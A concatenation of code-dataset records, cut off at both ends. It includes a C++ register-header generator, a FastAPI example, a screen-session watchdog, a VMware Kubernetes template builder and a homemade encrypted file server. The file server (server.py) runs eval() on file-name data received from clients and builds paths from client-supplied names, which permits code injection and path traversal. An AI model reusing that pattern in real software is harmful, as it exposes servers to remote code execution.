regs[reg] = {}\n regs[reg]['fields'] = {}\n regs[reg][prop] = value\n elif mbit:\n bf = mbit.group(1)\n prop = mbit.group(2)\n fields = regs[reg]['fields']\n if bf not in fields:\n fields[bf] = {}\n fields[bf][prop] = value\n else:\n print(f'WARNING - ignoring definition: {l!r}', file=sys.stderr)\n # Code generation options\n indent = 2\n guard = f'H_{regs_name}_HPP__'\n classname = regs_name\n bfclass = 'lwdo::regs::BitfieldDef'\n # Generate C++ code and print to stdout\n out = []\n out.append('// WARNING: auto-generated file, do not edit!')\n out.append('')\n out.append(f'#ifndef {guard}')\n out.append(f'#define {guard}')\n out.append('')\n out.append(f'struct {classname} {{')\n b = []\n # Import bitfield template\n b.append('template <unsigned RegOffset, unsigned RegWidth, unsigned FieldOffset, unsigned FieldWidth>')\n b.append(f'using BF = {bfclass}<RegOffset, RegWidth, FieldOffset, FieldWidth>;')\n b.append('')\n # Print fields\n for rname, rprops in regs.items():\n raddr = int(rprops['OFFSET'], 0)\n rsize = int(rprops['WIDTH'], 0)\n b.append(f'// {rname} @ 0x{raddr:04x}')\n for fname, fprops in rprops['fields'].items():\n faddr = int(fprops['OFFSET'], 0)\n fsize = int(fprops['WIDTH'], 0)\n b.append(f'static constexpr BF<0x{raddr:04x}, {rsize}, {faddr}, {fsize}> {rname}_{fname}{{}};')\n out.extend(indent_block(b, indent))\n out.append(f'}};')\n out.append('')\n out.append(f'#endif // {guard}')\n out.append('')\n print('\\n'.join(out))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"romavis/lwdo-sdr-fw","sub_path":"fpga/rggen/gen_cpp_regs.py","file_name":"gen_cpp_regs.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"9257992110","text":"from fastapi import FastAPI\nimport uvicorn\nfrom pydantic import BaseModel\nfrom typing import Union\n\n\napp = FastAPI()\n\nclass Item(BaseModel):\n name: str\n description: Union[str, None] = None\n price: float\n tax: Union[float, None] = None\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World\"}\n\n\n@app.get(\"/items/{item_id}\")\ndef read_item(item_id: int, q: str = None):\n return {\"item_id\": item_id, \"q\": q}\n\n@app.post(\"/items/\")\nasync def create_item(item: Item):\n return item\n\nuvicorn.run(app,host=\"0.0.0.0\",port=8080)","repo_name":"KayoRonald/Example-FastAPI-uvicorn-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25669224745","text":"import subprocess, os, psutil, logging\nfrom logging.handlers import TimedRotatingFileHandler\n\nfrom core import core\n\nLOG = core.get_logger('ensure')\n\nscreens = {\n 'telegram_dev': {\n 'active': True,\n 'name': 'SRC_TELEGRAM_DEV',\n 'dir': '/home/truegolliath/svntools/GolliathPrivate',\n 'shell_cmd': './telegram.sh'\n },\n 'telegram_prod': {\n 'active': True,\n 'name': 'SCR_TELEGRAM_PROD',\n 'dir': '/home/truegolliath/prodIO/GolliathPrivate',\n 'shell_cmd': './telegram.sh'\n },\n 'telegram_public_dev': {\n 'active': False,\n 'name': 'SCR_TELEGRAM_PUBLIC_DEV',\n 'dir': '/home/truegolliath/svntools/GolliathPrivate',\n 'shell_cmd': './telegram_public.sh'\n },\n 'telegram_public_prod': {\n 'active': True,\n 'name': 'SCR_TELEGRAM_PUBLIC',\n 'dir': '/home/truegolliath/prodIO/GolliathPrivate',\n 'shell_cmd': './telegram_public.sh'\n },\n '8080' : {\n 'active': True,\n 'name': 'SCR_VNC8080',\n 'dir': '/home/truegolliath/svntools',\n 'shell_cmd': './launch_8080.sh'\n },\n '8081': {\n 'active': True,\n 'name': 'SCR_VNC8081',\n 'dir': 
'/home/truegolliath/svntools',\n 'shell_cmd': './launch_8081.sh'\n },\n 'tunnel_public': {\n 'active': True,\n 'name': 'SCR_TUNNEL_PUBLIC',\n 'dir': '/home/truegolliath/svntools',\n 'shell_cmd': './mysql_tunnel.sh'\n }\n}\n\ndef get_cmd_output(cmd):\n result = subprocess.check_output(cmd, shell=True)\n lines = str(result).split(\"\\\\n\")\n i = 0\n output_lines = []\n for line in lines:\n line = line.replace('\\\\t',' ').replace('\\\\r','')\n output_lines.append(line)\n i += 1\n return output_lines\n\ncmd = \"screen -ls\"\nlines = get_cmd_output(cmd)\n\nfor name, screen in screens.items():\n active = screen['active']\n if not active:\n continue\n\n screen_name = screen['name']\n pid = None\n for line in lines:\n if '.%s '%screen_name in line:\n pid = line.split('.')[0].replace(' ','')\n pid = int(pid)\n\n if pid is None:\n os.chdir(screen['dir'])\n cmd = \"screen -dm -S %s bash -c '%s; exec bash'\"%(screen['name'],screen['shell_cmd'])\n LOG.error(' ==> Restart screen for %s'%name)\n if active:\n get_cmd_output(cmd)\n else:\n LOG.info('Screen %s %s is running ...'%(pid,name))\n\n p = psutil.Process(pid)\n if len(p.children()) != 0:\n child = p.children()[0]\n child_p = psutil.Process(child.pid)\n\n running = len(child_p.children()) != 0\n \n if not running:\n cmd = \"screen -S %s -X stuff '%s'$(echo '\\015')\"%(pid,screen['shell_cmd'])\n if active:\n get_cmd_output(cmd)\n LOG.error(' ==> Restart process %s %s in screen %s'%(screen['shell_cmd'],pid,name))\n else:\n LOG.info('Process %s %s in screen %s is running ...'%(screen['shell_cmd'],pid,name))\n","repo_name":"Tanguybes/alphaz","sub_path":"utils/ensure.py","file_name":"ensure.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22963063149","text":"import pathlib\nimport time\n\nfrom pyvcloud.vcd.client import FenceMode\nfrom pyvcloud.vcd.client import NetworkAdapterType\nfrom pyvcloud.vcd.exceptions import EntityNotFoundException\nfrom pyvcloud.vcd.exceptions import OperationNotSupportedException\nfrom pyvcloud.vcd.vapp import VApp\n\nfrom container_service_extension.common.constants.server_constants import TemplateBuildKey, TemplateScriptFile # noqa: E501\nfrom container_service_extension.common.utils.core_utils import download_file\nfrom container_service_extension.common.utils.core_utils import NullPrinter\nfrom container_service_extension.common.utils.core_utils import read_data_file\nimport container_service_extension.common.utils.pyvcloud_utils as vcd_utils\nfrom container_service_extension.common.utils.vsphere_utils import get_vsphere\nfrom container_service_extension.common.utils.vsphere_utils import vgr_callback\nfrom container_service_extension.common.utils.vsphere_utils import wait_until_tools_ready # noqa: E501\nimport container_service_extension.installer.templates.local_template_manager as ltm # noqa: E501\nfrom container_service_extension.logging.logger import NULL_LOGGER\nimport container_service_extension.server.compute_policy_manager as compute_policy_manager # noqa: E501\n\n\n# used for creating temp vapp\nTEMP_VAPP_NETWORK_ADAPTER_TYPE = NetworkAdapterType.VMXNET3.value\nTEMP_VAPP_FENCE_MODE = FenceMode.BRIDGED.value\n\n\ndef assign_placement_policy_to_template(client, cse_placement_policy,\n catalog_name, catalog_item_name,\n org_name, logger=NULL_LOGGER,\n log_wire=False, msg_update_callback=NullPrinter()): # noqa: E501\n\n cpm = compute_policy_manager.ComputePolicyManager(client,\n log_wire=log_wire)\n try:\n 
policy = compute_policy_manager.get_cse_vdc_compute_policy(\n cpm,\n cse_placement_policy,\n is_placement_policy=True)\n task = cpm.assign_vdc_placement_policy_to_vapp_template_vms(\n policy['href'],\n org_name,\n catalog_name,\n catalog_item_name)\n if task is not None:\n client.get_task_monitor().wait_for_success(task)\n msg = \"Successfully tagged template \" \\\n f\"{catalog_item_name} with placement policy \" \\\n f\"{cse_placement_policy}.\"\n else:\n msg = f\"{catalog_item_name} already tagged with\" \\\n f\" placement policy {cse_placement_policy}.\"\n msg_update_callback.general(msg)\n logger.info(msg)\n except Exception as err:\n msg = f\"Failed to tag template {catalog_item_name} with \" \\\n f\"placement policy {cse_placement_policy}. Error: {err}\"\n msg_update_callback.error(msg)\n logger.error(msg)\n raise\n\n\nclass TemplateBuilder:\n \"\"\"Builder calls for K8 templates.\"\"\"\n\n def __init__(self, client, sys_admin_client, build_params, org=None,\n vdc=None, ssh_key=None, logger=NULL_LOGGER,\n msg_update_callback=NullPrinter(), log_wire=False):\n \"\"\".\n\n :param pyvcloud.vcd.Client client:\n :param pyvcloud.vcd.Client sys_admin_client:\n :param dict build_params:\n :param pyvcloud.vcd.org.Org org: specific org to use. Will override the\n org_name specified in build_params, can be used to save few vCD\n calls to create the Org object.\n :param pyvcloud.vcd.vdc.VDC vdc: specific vdc to use. Will override the\n vdc_name specified in build_params, can be used to save few vCD\n calls to create the Vdc object.\n :param str ssh_key: public ssh key to place into the template vApp(s).\n :param logging.Logger logger: logger object.\n :param utils.ConsoleMessagePrinter msg_update_callback:\n Callback object.\n \"\"\"\n self._is_valid = False\n\n self.client = client\n self.sys_admin_client = sys_admin_client\n self.ssh_key = ssh_key\n self.logger = logger\n self.msg_update_callback = msg_update_callback\n\n if self.client is None or self.sys_admin_client is None:\n return\n\n # validate and populate required fields\n self.template_name = build_params.get(TemplateBuildKey.TEMPLATE_NAME) # noqa: E501\n self.template_revision = build_params.get(TemplateBuildKey.TEMPLATE_REVISION) # noqa: E501\n self.ova_name = build_params.get(TemplateBuildKey.SOURCE_OVA_NAME) # noqa: E501\n self.ova_href = build_params.get(TemplateBuildKey.SOURCE_OVA_HREF) # noqa: E501\n self.ova_sha256 = build_params.get(TemplateBuildKey.SOURCE_OVA_SHA256) # noqa: E501\n\n if org:\n self.org = org\n self.org_name = org.get_name()\n else:\n self.org_name = build_params.get(TemplateBuildKey.ORG_NAME) # noqa: E501\n self.org = vcd_utils.get_org(self.client, org_name=self.org_name)\n if vdc:\n self.vdc = vdc\n self.vdc.get_resource() # to make sure vdc.resource is populated\n self.vdc_name = vdc.name\n else:\n self.vdc_name = build_params.get(TemplateBuildKey.VDC_NAME) # noqa: E501\n self.vdc = vcd_utils.get_vdc(\n self.client, vdc_name=self.vdc_name, org=self.org\n )\n self.catalog_name = build_params.get(TemplateBuildKey.CATALOG_NAME) # noqa: E501\n self.catalog_item_name = build_params.get(TemplateBuildKey.CATALOG_ITEM_NAME) # noqa: E501\n self.catalog_item_description = \\\n build_params.get(TemplateBuildKey.CATALOG_ITEM_DESCRIPTION) # noqa: E501\n\n self.temp_vapp_name = build_params.get(TemplateBuildKey.TEMP_VAPP_NAME) # noqa: E501\n self.temp_vm_name = build_params.get(TemplateBuildKey.TEMP_VM_NAME) # noqa: E501\n self.cpu = build_params.get(TemplateBuildKey.CPU)\n self.memory = 
build_params.get(TemplateBuildKey.MEMORY)\n self.network_name = build_params.get(TemplateBuildKey.NETWORK_NAME) # noqa: E501\n self.ip_allocation_mode = build_params.get(TemplateBuildKey.IP_ALLOCATION_MODE) # noqa: E501\n self.storage_profile = build_params.get(TemplateBuildKey.STORAGE_PROFILE) # noqa: E501\n self.cse_placement_policy = build_params.get(TemplateBuildKey.CSE_PLACEMENT_POLICY) # noqa: E501\n self.remote_cookbook_version = build_params.get(TemplateBuildKey.REMOTE_COOKBOOK_VERSION) # noqa: E501\n self.log_wire = log_wire\n\n if self.template_name and self.template_revision and \\\n self.ova_name and self.ova_href and self.ova_sha256 and \\\n self.org and self.org_name and self.vdc and self.vdc_name and \\\n self.catalog_name and self.catalog_item_name and \\\n self.catalog_item_description and self.temp_vapp_name and \\\n self.temp_vm_name and self.cpu and self.memory and \\\n self.network_name and self.ip_allocation_mode and \\\n self.storage_profile:\n self._is_valid = True\n\n def _cleanup_old_artifacts(self):\n \"\"\"Delete source ova, K8 template and temp vApp.\"\"\"\n msg = \"If K8 template, source ova file, and temporary vApp exists, \" \\\n \"they will be deleted\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n self._delete_catalog_item(item_name=self.catalog_item_name)\n self._delete_catalog_item(item_name=self.ova_name)\n self._delete_temp_vapp()\n\n def _delete_catalog_item(self, item_name):\n \"\"\"Delete a catalog item.\n\n The catalog item to delete, is searched in the catalog specified via\n build_params.\n\n :param str item_name: name of the item to delete.\n \"\"\"\n try:\n self.org.delete_catalog_item(\n name=self.catalog_name,\n item_name=item_name\n )\n vcd_utils.wait_for_catalog_item_to_resolve(\n client=self.client, catalog_name=self.catalog_name,\n catalog_item_name=item_name, org=self.org\n )\n self.org.reload()\n\n msg = f\"Deleted '{item_name}' from catalog '{self.catalog_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n except EntityNotFoundException:\n pass\n\n def _delete_temp_vapp(self):\n \"\"\"Delete the temp vApp for the K8 template.\"\"\"\n try:\n msg = f\"Deleting temporary vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n task = self.vdc.delete_vapp(self.temp_vapp_name, force=True)\n self.client.get_task_monitor().wait_for_success(task)\n self.vdc.reload()\n\n msg = f\"Deleted temporary vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n except EntityNotFoundException:\n pass\n\n def _upload_source_ova(self):\n \"\"\"Upload the base OS ova to catalog.\"\"\"\n if vcd_utils.catalog_item_exists(\n org=self.org,\n catalog_name=self.catalog_name,\n catalog_item_name=self.ova_name\n ):\n msg = f\"Found ova file '{self.ova_name}' in catalog \" \\\n f\"'{self.catalog_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n else:\n ova_filepath = f\"cse_cache/{self.ova_name}\"\n download_file(url=self.ova_href, filepath=ova_filepath,\n sha256=self.ova_sha256, logger=self.logger,\n msg_update_callback=self.msg_update_callback)\n catalog_item_name = pathlib.Path(ova_filepath).name\n vcd_utils.upload_ova_to_catalog(\n client=self.client,\n source_filepath=ova_filepath,\n catalog_name=self.catalog_name,\n catalog_item_name=catalog_item_name,\n org=self.org,\n logger=self.logger,\n msg_update_callback=self.msg_update_callback\n )\n\n def _get_init_script(self):\n \"\"\"Read the initialization script 
from disk to create temp vApp.\n\n :return: content of the initialization script.\n\n :rtype: str\n \"\"\"\n init_script_filepath = ltm.get_script_filepath(\n self.remote_cookbook_version,\n self.template_name,\n self.template_revision,\n TemplateScriptFile.INIT)\n init_script = read_data_file(\n init_script_filepath, logger=self.logger,\n msg_update_callback=self.msg_update_callback)\n if self.ssh_key is not None:\n init_script += \\\n f\"mkdir -p /root/.ssh\\n\" \\\n f\"echo '{self.ssh_key}' >> /root/.ssh/authorized_keys\\n\" \\\n f\"chmod -R go-rwx /root/.ssh\"\n return init_script\n\n def _create_temp_vapp(self):\n \"\"\"Create the temporary vApp.\"\"\"\n try:\n self._delete_temp_vapp()\n except EntityNotFoundException:\n pass\n\n msg = f\"Creating vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n init_script = self._get_init_script()\n\n vapp_sparse_resource = self.vdc.instantiate_vapp(\n self.temp_vapp_name,\n self.catalog_name,\n self.ova_name,\n network=self.network_name,\n fence_mode=TEMP_VAPP_FENCE_MODE,\n ip_allocation_mode=self.ip_allocation_mode,\n network_adapter_type=TEMP_VAPP_NETWORK_ADAPTER_TYPE,\n deploy=True,\n power_on=True,\n memory=self.memory,\n cpu=self.cpu,\n password=None,\n cust_script=init_script,\n accept_all_eulas=True,\n vm_name=self.temp_vm_name,\n hostname=self.temp_vm_name,\n storage_profile=self.storage_profile)\n task = vapp_sparse_resource.Tasks.Task[0]\n self.client.get_task_monitor().wait_for_success(task)\n self.vdc.reload()\n\n msg = f\"Created vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n return VApp(self.client, href=vapp_sparse_resource.get('href'))\n\n def _customize_vm(self, vapp, vm_name):\n \"\"\"Customize a vm in a VApp using customization script.\n\n :param pyvcloud.vcd.vapp.VApp vapp:\n :param str vm_name:\n\n :raises Exception: if unable to execute the customization script in\n the vm.\n \"\"\"\n msg = f\"Customizing vApp '{self.temp_vapp_name}', vm '{vm_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n cust_script_filepath = ltm.get_script_filepath(\n self.remote_cookbook_version,\n self.template_name,\n self.template_revision,\n TemplateScriptFile.CUST\n )\n cust_script = read_data_file(\n cust_script_filepath,\n logger=self.logger,\n msg_update_callback=self.msg_update_callback\n )\n\n vs = get_vsphere(\n self.sys_admin_client,\n vapp,\n vm_name,\n logger=self.logger\n )\n callback = vgr_callback(\n prepend_msg='Waiting for guest tools, status: \"',\n logger=self.logger,\n msg_update_callback=self.msg_update_callback\n )\n wait_until_tools_ready(vapp, vm_name, vs, callback=callback)\n password_auto = vapp.get_admin_password(vm_name)\n\n try:\n time.sleep(75) # temporary hack for authentication\n result = vs.execute_script_in_guest(\n vs.get_vm_by_moid(vapp.get_vm_moid(vm_name)),\n 'root',\n password_auto,\n cust_script,\n target_file=None,\n wait_for_completion=True,\n wait_time=10,\n get_output=True,\n delete_script=True,\n callback=vgr_callback(\n logger=self.logger,\n msg_update_callback=self.msg_update_callback))\n except Exception as err:\n # TODO() replace raw exception with specific exception\n # unsure all errors execute_script_in_guest can result in\n # Docker TLS handshake timeout can occur when internet is slow\n self.msg_update_callback.error(\n \"Failed VM customization. 
Check CSE install log\")\n self.logger.error(f\"Failed VM customization with error: {err}\",\n exc_info=True)\n raise\n\n if len(result) > 0:\n msg = f'Result: {result}'\n self.msg_update_callback.general_no_color(msg)\n self.logger.debug(msg)\n\n result_stdout = result[1].content.decode()\n result_stderr = result[2].content.decode()\n\n msg = 'stderr:'\n self.msg_update_callback.general_no_color(msg)\n self.logger.debug(msg)\n if len(result_stderr) > 0:\n self.msg_update_callback.general_no_color(result_stderr)\n self.logger.debug(result_stderr)\n\n msg = 'stdout:'\n self.msg_update_callback.general_no_color(msg)\n self.logger.debug(msg)\n if len(result_stdout) > 0:\n self.msg_update_callback.general_no_color(result_stdout)\n self.logger.debug(result_stdout)\n\n if len(result) == 0 or result[0] != 0:\n msg = \"Failed VM customization\"\n self.msg_update_callback.error(f\"{msg}. Please check logs.\")\n self.logger.error(\n f\"{msg}\\nResult start===\\n{result}\\n===Result end\",\n exc_info=True)\n # TODO: replace raw exception with specific exception\n raise Exception(f\"{msg}; Result: {result}\")\n\n # Do not reboot VM after customization. Reboot will generate a new\n # machine-id, and once we capture the VM, all VMs deployed from the\n # template will have the same machine-id, which can lead to\n # unpredictable behavior\n\n msg = f\"Customized vApp '{self.temp_vapp_name}', vm '{vm_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n def _capture_temp_vapp(self, vapp):\n \"\"\"Capture a vapp as a template.\n\n :param pyvcloud.vcd.VApp vapp:\n \"\"\"\n msg = f\"Creating K8 template '{self.catalog_item_name}' from vApp \" \\\n f\"'{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n # DEV NOTE: With api v33.0 and onwards, get_catalog operation will fail\n # for non admin users of an org which is not hosting the catalog, even\n # if the catalog is explicitly shared with the org in question. 
Please\n # use this method only for org admin and sys admins.\n catalog = self.org.get_catalog(self.catalog_name)\n try:\n msg = f\"Shutting down vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n vapp.reload()\n task = vapp.shutdown()\n self.client.get_task_monitor().wait_for_success(task)\n vapp.reload()\n\n msg = f\"Successfully shut down vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n except OperationNotSupportedException as err:\n if self.logger:\n self.logger.debug(\"Encountered error with shutting down vApp \"\n f\"'{self.temp_vapp_name}'\" + str(err))\n\n msg = f\"Capturing template '{self.catalog_item_name}' from vApp \" \\\n f\"'{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n task = self.org.capture_vapp(catalog, vapp.href,\n self.catalog_item_name,\n self.catalog_item_description,\n customize_on_instantiate=True,\n overwrite=True)\n self.client.get_task_monitor().wait_for_success(task)\n self.org.reload()\n\n msg = f\"Created K8 template '{self.catalog_item_name}' from vApp \" \\\n f\"'{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n def _tag_with_cse_placement_policy(self):\n \"\"\"Tag the created template with placement policies if provided.\"\"\"\n if not self.cse_placement_policy:\n msg = \"Skipping tagging template with placement policy.\"\n self.msg_update_callback.info(msg)\n self.logger.debug(msg)\n return\n assign_placement_policy_to_template(\n self.client,\n self.cse_placement_policy,\n self.catalog_name,\n self.catalog_item_name,\n self.org_name,\n logger=self.logger,\n log_wire=self.log_wire,\n msg_update_callback=self.msg_update_callback)\n\n def build(self, force_recreate=False, retain_temp_vapp=False):\n \"\"\"Create a K8 template.\n\n :param bool force_recreate: if True and template already exist in vCD,\n overwrites existing template.\n :param bool retain_temp_vapp: if True, temporary vApp will not be\n deleted, so the user can ssh into its vm and debug.\n \"\"\"\n if not self._is_valid:\n raise Exception('Invalid params for building template.')\n\n if not force_recreate:\n if vcd_utils.catalog_item_exists(\n org=self.org,\n catalog_name=self.catalog_name,\n catalog_item_name=self.catalog_item_name\n ):\n self._tag_with_cse_placement_policy()\n msg = f\"Found template '{self.template_name}' at revision \" \\\n f\"{self.template_revision} in catalog \" \\\n f\"'{self.catalog_name}.'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n return\n else:\n self._cleanup_old_artifacts()\n\n self._upload_source_ova()\n vapp = self._create_temp_vapp()\n self._customize_vm(vapp, self.temp_vm_name)\n self._capture_temp_vapp(vapp)\n self._tag_with_cse_placement_policy()\n if not retain_temp_vapp:\n self._delete_temp_vapp()\n","repo_name":"vmware/container-service-extension","sub_path":"container_service_extension/installer/templates/template_builder.py","file_name":"template_builder.py","file_ext":"py","file_size_in_byte":20731,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"} +{"seq_id":"38818722076","text":"import os\nimport pickle\nfrom threading import Thread\nimport time\nfrom queue import Queue, Empty\nimport secrets\nimport sys\nimport socket\nimport string\n\nimport tools.toolbox as tb\nfrom tools.layer import Layer\nfrom database.database import Database\n\ndata = b\"\"\n\"\"\"\nlayer1 = 
Layer()\nlayer1.change_keys(\"1\")\nlayer2 = Layer()\nlayer2.change_keys(\"2\")\n\"\"\"\n\nfinished = False\nsessions = {}\nconversations = {}\nsock_to_layer = {}\npersonal_port = 55559\nip = None\n\nlayer0 = Layer()\nserver_layer = Layer()\nkey_dir = \"keys/\"\n\n\ndef find_my_ip():\n global ip\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n nat_ip_address = s.getsockname()[0]\n s.close()\n ip = nat_ip_address\n\n\ndef boot(HOST, PORT):\n \"\"\"\n Makes a connection with the directory server\n :param HOST: directory server ip\n :param PORT: directory server port\n :return:\n \"\"\"\n global ip\n\n find_my_ip()\n\n server_layer.store_keys(key_dir)\n with open(key_dir + \"public_key.pem\", \"r\") as k:\n pk = k.read()\n\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.bind((ip, personal_port))\n client_socket.connect((HOST, PORT))\n\n message = b\"S\" + pickle.dumps((ip, personal_port, \"CONNECTING\", pk))\n\n client_socket.send(message)\n response = client_socket.recv(1024).decode('utf-8')\n\n print(response)\n if response != \"OK\" and response != \"REACTIVATED\":\n input()\n\n client_socket.close()\n\n\ndef packet_handle():\n \"\"\"\n starts server and allows listening\n :return:\n \"\"\"\n global ip\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (ip, personal_port)\n server_socket.bind(server_address)\n\n server_socket.listen(5)\n print(\"Server is listening on\", server_address)\n\n while True:\n client_socket, client_address = server_socket.accept()\n\n # Create a thread to handle the client\n client_thread = Thread(target=handle_client, args=(client_socket, client_address))\n client_thread.start()\n\n\ndef handle_client(client_socket, client_address):\n print(\"Connected:\", client_address)\n db = Database()\n\n while True:\n data = recv_all(client_socket)\n if not data[1]:\n break\n data = data[0]\n if not data:\n break\n process_data(data, client_socket, client_address, db)\n\n client_socket.close()\n if client_socket in sessions:\n del sessions[client_socket]\n print(\"Disconnected:\", client_address)\n\n\ndef process_data(data, client_socket, client_address, db):\n global conversations\n\n key = str(client_address)\n data = decrypt_packet(data)\n\n code = data[:1]\n\n if code == b\"I\":\n signin(key, data[1:], client_socket, db)\n return\n if code == b\"S\":\n signup(key, data[1:], client_socket, db)\n return\n if code == b\"B\":\n save_pk(key, data[1:], client_socket)\n reply(b\"Started\", b'\\xf2\\xee\\x07', client_socket)\n return\n\n if client_socket not in sessions:\n reply(b\"Not signed-in\", b'\\xf2\\xee\\x07', client_socket)\n return\n\n if code == b\"U\":\n if client_socket in conversations:\n upload_request(key, data[1:], client_socket)\n else:\n file_name = data[1:]\n conversations[client_socket] = file_name\n # blue v for accepting\n reply(b\"Request accepted\", b'\\xf2\\xee\\x07', client_socket)\n return\n if code == b\"D\":\n file_names = data[1:]\n download(key, file_names, client_socket)\n return\n if code == b\"L\":\n send_list(key, client_socket)\n return\n\n\ndef save_pk(key, pk, cs):\n global sock_to_layer\n with open(key_dir + f\"public_key[{key}]\".replace(\".\", \"_\") + \".pem\", \"wb\") as k:\n k.write(pk)\n\n l = Layer()\n l.change_keys(key_dir, f\"[{key}]\".replace(\".\", \"_\"), False)\n sock_to_layer[cs] = l\n\n\ndef signin(key, user, cs, db):\n h, auth = pickle.loads(user)\n if not db.check_user_exists(h):\n reply(b\"Hash incorrect\", 
b'\\xd3\\xb6\\xad', cs)\n return\n if not db.check_user_otp(h, auth):\n reply(b\"Auth incorrect\", b'\\xd3\\xb6\\xad', cs)\n return\n reply(b\"sign in successful\", b'\\xc6\\xbd\\x06', cs)\n sessions[cs] = db.get_user_by_hash(h)[0]\n\n\ndef signup(key, user, cs, db):\n alphabet = string.ascii_letters + string.digits\n random_hash = ''.join(secrets.choice(alphabet) for _ in range(10))\n\n result = db.add_user(random_hash)\n print(result)\n print(db.get_all_users())\n if result:\n sessions[cs] = db.get_user_by_hash(random_hash)[0]\n os.mkdir(f\"server_files/f{sessions[cs]}\")\n reply(pickle.dumps((random_hash, result)), b'\\x9d\\xf6\\x9e', cs)\n else:\n reply(b\"User already exists\", b'\\xd3\\xb6\\xad', cs)\n\n\ndef send_list(key, cs):\n user_folder = sessions[cs]\n entries = os.scandir(f\"server_files/f{user_folder}\")\n entry_list = list_from_iter(entries)\n if \"Thumbs.db\" in entry_list:\n entry_list.remove(\"Thumbs.db\")\n reply(str(entry_list).encode('utf-8'), b'\\x98\\x16\\xac', cs)\n\n\ndef download(key, file_names, cs):\n user_folder = sessions[cs]\n file_names = eval(file_names)\n\n # blue v for accepting\n reply(b\"Request accepted\", b'\\xf2\\xee\\x07', cs)\n\n for file in file_names:\n with open(f\"server_files/f{user_folder}/{file}\", \"rb\") as f:\n data = f.read()\n print(len(data))\n reply(file.encode(), b'\\xa7\\x98\\xa8', cs)\n reply(data, b'\\xa7\\x98\\xa8', cs)\n\n\ndef upload_request(key, load, cs):\n global conversations\n\n upload(load, conversations[cs], key, cs)\n del conversations[cs]\n\n\ndef upload(data, file_name, key, cs):\n user_folder = sessions[cs]\n with open(f\"server_files/f{user_folder}/{file_name.decode()}\", \"wb\") as i:\n i.write(data)\n time.sleep(0.001)\n reply(b'upload complete', b'\\x9d\\xb7\\xe3', cs)\n\n\ndef reply(data, code_prefix, sock):\n \"\"\"\n Sends back replies on received messages to imitate a server\n :param code_prefix: to let other side know meaning of aproach\n :param data: The data that is to be replied\n :param sock: client socket\n :return:\n \"\"\"\n sendable_data = encrypt_packet(code_prefix + data, sock)\n sock.sendall(str(len(sendable_data)).zfill(10).encode() + sendable_data)\n\n\ndef list_from_iter(iter):\n l = []\n for i in iter:\n l.append(i.name)\n return l\n\n\ndef decrypt_packet(data):\n decrypted_data = server_layer.decrypt(data)\n return decrypted_data\n\n\ndef encrypt_packet(data, cs):\n global sock_to_layer\n layer = sock_to_layer[cs]\n encrypted_data = layer.b_encrypt(data)\n return encrypted_data\n\n\ndef recv_all(sock):\n \"\"\"\n function that receive data from socket by the wanted format\n :param sock: socket\n :return: tuple - (msg/error - str, status(True for ok, False for error))\n \"\"\"\n try:\n msg_size = sock.recv(10)\n except:\n return \"recv error\", False\n if not msg_size:\n return \"msg length error\", False\n try:\n msg_size = int(msg_size)\n except: # not an integer\n return \"msg length error\", False\n\n msg = b''\n # this is a fail - safe -> if the recv not giving the msg in one time\n while len(msg) < msg_size:\n try:\n msg_fragment = sock.recv(msg_size - len(msg))\n except:\n return \"recv error\", False\n if not msg_fragment:\n return \"msg data is none\", False\n msg = msg + msg_fragment\n\n return msg, True\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n personal_port = int(sys.argv[1])\n\nboot(\"10.0.0.24\", 
55677)\npacket_handle()\n","repo_name":"nom28/Tor_Final_Project","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16124448310","text":"from flask import Flask, request\nfrom flask_mail import Mail, Message\n\napp = Flask(__name__)\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'username@gmail.com'\napp.config['MAIL_PASSWORD'] = 'password'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\nmail = Mail(app)\n\n@app.route('/send_message', methods=['POST'])\ndef send_newsletter():\n subject = request.get_json()['subject']\n message = request.get_json()['message']\n sender = request.get_json()['sender_mail']\n recipients = request.get_json()['recipients_mail']\n send_request = Message(f'{subject}', sender = f'{sender}', recipients = recipients)\n send_request.body = f\"{message}\"\n mail.send(send_request)\n return \"Message sent to the newsletter subscribers\"\n\nif 